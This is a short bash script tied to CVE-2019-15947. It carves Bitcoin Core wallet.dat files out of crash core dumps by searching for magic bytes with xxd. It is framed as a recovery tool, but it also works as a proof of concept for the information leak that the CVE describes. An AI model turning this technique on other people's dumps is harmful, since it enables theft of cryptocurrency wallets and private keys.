#!/bin/bash
#
# ./makeitrain.sh bitcoin-qt.crashdump.core
#   __ _  _  __   ___  __  ____ ____
#  /  ( \/ )/ _\ / __)/ _\/ ___(_  )
# (  O )  (/    ( (_ /    \___ \ )(
#  \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Donations:
# btc: 366pCbaSHGCqkuuXKxAPxc9BxPXGF3heTV
# CVE-2019-15947
# https://oxasploits.com/posts/exploit-archive-partial-disclosure/
#
# I likeeee... bigggg butts and I cannot lie...
# Tested on Bitcoin Core version v0.18.0 (64-bit)
#
# A utility to recover a bitcoin wallet.dat
# from coredumps. (memory dumps)
# PLEASE back up your wallet.dat first!
# No telling if importing one of these recovered
# wallets could cause futher data courruption!
#
# I claim no responsibity for the use of this code!
#
# By oxagast / Marshall Whittaker
# marshall@oxasploits.com
# Notes:
# This was tested on linux x86_64 crash dumps.
# When loading the recovered files, you may
# have to try to load it more than once.
# You'll probably get an error about missing
# address book information.
# Adjusting the CLEN variable (wallet size in
# characters) may help if the wallet is not
# recovered.
if [ "$#" -ne 1 ]; then
  echo "You must enter the core dump file as the only argument."
  exit 1
fi
COREFN=$1
CLEN=98304

echo "Attempting to recover wallet.dat from $COREFN"
echo "Using wallet length: $CLEN characters... (adjusting CLEN may help if wallet is not recovered)"

COUNT=0
if test -f "$COREFN"; then
  echo "Grepping for magic numbers..."
  xxd $COREFN | grep "6231 0500" >walletoffsets
  if [ $(cat walletoffsets | wc -l) -eq 0 ]; then
    echo "Cannot recover from this file."
    echo "Sorry!"
    rm walletoffsets
    exit 1
  fi
  while read START; do
    let "COUNT++"
    POFF=$(echo $START | sed -e 's/.*b1//' | head -n $COUNT | tail -n 1 | wc -c)
    POFFH=$(printf "%x\n" $POFF)
    OFFSET=$(echo $START | sed -e 's/:.*//')
    OFFSET="0x$OFFSET"
    POFFH="0x$POFFH"
    echo "Offset: $OFFSET Difference: $POFFH"
    HEXSUBBED=$(printf "0x%X\n" $(($OFFSET - ($POFFH - 0x03))))
    echo $HEXSUBBED
    echo "Seeking to $HEXSUBBED..."
    xxd -p -l $CLEN --seek $HEXSUBBED $COREFN >test$COUNT.xxd
    echo "Writing new wallet: test$COUNT.dat..."
    xxd -p -r test$COUNT.xxd >test$COUNT.dat
    xxd test$COUNT.dat | head -n 1
  done <walletoffsets
  echo "Removing temporary files"
  rm test*.xxd
  rm walletoffsets
  echo "Now try to load each of the test dat files."
  echo "Sometimes they need to be loaded twice."
  echo "Ignore any errors about addressbook being courrupted."
  exit 0
else
  echo "File doesn't exist..."
fi